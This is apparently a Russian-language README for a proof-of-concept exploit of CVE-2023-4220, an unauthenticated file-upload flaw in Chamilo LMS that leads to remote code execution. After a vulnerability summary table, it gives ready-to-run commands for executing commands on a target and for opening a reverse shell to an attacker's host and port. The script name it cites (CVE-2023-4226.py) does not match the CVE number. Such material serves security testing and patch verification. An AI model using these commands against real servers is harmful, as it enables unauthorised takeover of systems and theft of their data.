
POC для CVE-2023-4220 - Chamilo LMS: неаутентифицированное удаленное выполнение кода через загрузку большого файла
| Продукт | Chamilo |
|---|
| Производитель | Chamilo |
| Критичность | Высокая — злоумышленники могут использовать уязвимости программного обеспечения для получения удаленного выполнения кода без аутентификации. |
| Затронутые версии | <= v1.11.24 |
| Протестированные версии | v1.11.24 (последняя версия на момент написания) |
| Идентификатор CVE | CVE-2023-4220 |
| Описание CVE | Неограниченная загрузка файлов в функционале загрузки больших файлов в /main/inc/lib/javascript/bigupload/inc/bigUpload.php в Chamilo LMS <= v1.11.24 позволяет неаутентифицированным злоумышленникам выполнять хранимые межсайтовые скриптовые атаки и получать удаленное выполнение кода путем загрузки веб-шелла. |
| Классификация CWE | CWE-434: Неограниченная загрузка файла с опасным типом |
| Классификация CAPEC | CAPEC-650: Загрузка веб-шелла на веб-сервер |
Для выполнения команд напрямую используйте следующую команду:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami
Для получения reverse shell используйте следующую команду:
python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>